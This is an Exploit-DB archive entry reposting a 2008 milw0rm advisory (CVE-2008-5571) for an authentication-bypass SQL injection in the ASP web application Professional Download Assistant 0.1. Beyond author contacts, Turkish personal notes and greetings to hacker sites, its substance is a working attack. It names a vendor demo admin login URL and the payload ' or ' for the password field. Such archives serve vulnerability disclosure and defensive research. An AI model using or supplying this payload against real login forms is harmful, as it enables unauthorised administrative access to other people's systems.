Professional Download Assistant 0.1 Auth Bypass SQL Injection Vuln

2008-12-09T00:00:00
ID EDB-ID:7390
Type exploitdb
Reporter ZoRLu
Modified 2008-12-09T00:00:00

Description

Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln. CVE-2008-5571. Webapps exploit for asp platform

                                        
                                            [~] Professional Download Assistant 0.1 Bypass
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] Date: 08/12/2008
[~]
[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------

exp for demo: 

http://www.dotnetindex.com/demos/prodownloadmanager/admin/

user: ZoRLu

passwd: ' or '

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke 
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-12-09]